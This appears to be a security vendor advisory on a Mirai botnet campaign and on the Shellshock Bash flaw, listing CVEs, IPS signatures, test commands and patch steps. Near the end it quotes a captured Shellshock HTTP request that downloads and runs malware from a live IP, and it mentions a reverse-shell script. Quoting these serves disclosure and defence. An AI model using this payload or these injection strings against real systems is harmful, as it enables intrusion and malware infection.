The SonicWall Capture Labs Threat Research team has received reports about a new Mirai botnet malware targeting network security devices. The Mirai botnet malware attack involves many different brands of connected network security devices that are affected by critical vulnerabilities. The following vulnerabilities are involved:

• CVE-2020-25506: D-Link DNS-320 firewall exploit
• CVE-2021-27561: Yealink Device Management remote code-execution (RCE)
• CVE-2021-27562: Yealink Device Management remote code-execution (RCE)
• CVE-2020-26919: Netgear ProSAFE Plus exploit
• CVE-2021-22502: Micro Focus Operation Bridge Reporter RCE
• CVE-2019-19356: Netis WF2419 Wireless Router Remote Code Execution (RCE)
• VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability

On March 16, 2021, SonicWall Capture Labs Threat Research team released the following signatures to protect against such attacks:

• CVE-2020-25506
  IPS:15455 D-Link DNS-320 system_mgr.cgi Command Injection
• CVE-2021-27561/CVE-2021-27562
  IPS:15456 Yealink DM Remote Code Execution
• CVE-2021-22502
  IPS:15457 Micro Focus Operations Bridge Reporter Command Injection
• CVE-2019-19356
  IPS:15458 Netis WF2419 netcore_set.cgi Remote Code Execution
• VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability
  This is an old vulnerability. SonicWall released the patch for this vulnerability in 2015. There are also existing signatures detecting it:
  IPS:5603 GNU Bash Code Injection (CVE-2014-6271) 2
  IPS:13064 GNU Bash Code Injection (CVE-2014-6278)
• GAV signatures to cover malware samples:
  GAV: Mirai.LL
  GAV: Mirai.LL_1

Researchers have discovered a critical arbitrary code execution vulnerability in GNU Bash through version 4.3. This vulnerability involves various widely-used applications including ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, etc.

The Dell SonicWALL Threat Research Team has created and released IPS signatures for its line of next-generation firewalls and its Web Application Firewall (WAF) module on the SMB SRA product line. These signatures were released on Sept 24, 2014, the same day the vulnerability was publicly disclosed.

Firewall Appliance Signature:

• 10529 GNU Bash Code Injection Vulnerability (CVE-2014-6271) 1
• 5603 GNU Bash Code Injection Vulnerability (CVE-2014-6271) 2
• 5605 GNU Bash Code Injection Vulnerability (CVE-2014-6271) 3
• 5661 GNU Bash Code Injection Vulnerability (CVE-2014-7169) 1

Web Application Firewall on the SMB SRA Series Signature:

• 1603 Bash Code Injection

Dell SonicWALL has researched the vulnerability and release additional signatures. The following is the analysis of the vulnerability.

Vulnerability Diagnostic

1. To identify the vulnerability, please check the version of bash shell. For example, run the following command under Ubuntu, Bash version 4.2.24 and priors are vulnerable:



2. To confirm the vulnerability, please test with following command:

env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'

The vulnerable version will generate the following results:



3. Apply the patch for CVE-2014-6271 in various platform:

Command for applying the patch on Ubuntu:

sudo apt-get update && sudo apt-get install bash

Command for applying the patch on Red Hat Enterprise Linux:

yum update bash

For Arch Linux

pacman -Syu

4. The following figure shows the patched version 4.2.25:



5. Test against patched version with the script in step 2 will generate the following results:

Patch Code Analysis

The following code snippets released on 2014-09-25 12:45:07 (GMT) shows the patch for CVE-2014-6271.

Two new flag bits SEVAL_FUNCDEF and SEVAL_ONECMD were added:

The new flag bits are set when initializing shell variables:

If the flags are set, the execution process will be broken.

Note that the patch for CVE-2014-6271 is incomplete. A new CVE ID CVE-2014-7169 was created for it, and the patch is still under development. The following command tests the new vulnerability CVE-2014-7169:

env X='() { (a)=>' sh -c "echo date"; cat echo

Test Case Example

There are multiple scenarios to apply the attacks address the vulnerability. Here is the list includes most likely affected applications:

• Apache with CGI Module enabled (Httpd)
• SecureShell (SSH)
• Dhclient
• CUPS

Among them, Apache with CGI Module enabled are most targeted. An attacker can simply send out a well-crafted HTTP request to Apache server with CGI scripts parsed by vulnerable bash shell to acquire the full access of the target server under the web server user permission. The following figure shows the python script:

By running this script against the target vulnerable Apache server, a reverse shell can be built, which full access under www-data user’s permission is granted, for example, show all the users (/etc/passwd) in the system:

As a follow-up to our coverage of Shellshock, CVE-2014-6271, attackers appear to have rapidly developed automated exploit scripts to find vulnerable Linux servers and deliver a new ELF malware. A typical method to deliver malware is:

 GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; .Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; .Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; .Accept:.*/* 

A detailed analysis of the malware infection cycle can be found here.

This article has been updated on Sept 26, 2014. Dell SonicWALL will continue to monitor the vulnerability, telemetry data and release additional information as needed. For ongoing updates and additional information, check the SonicALERT website.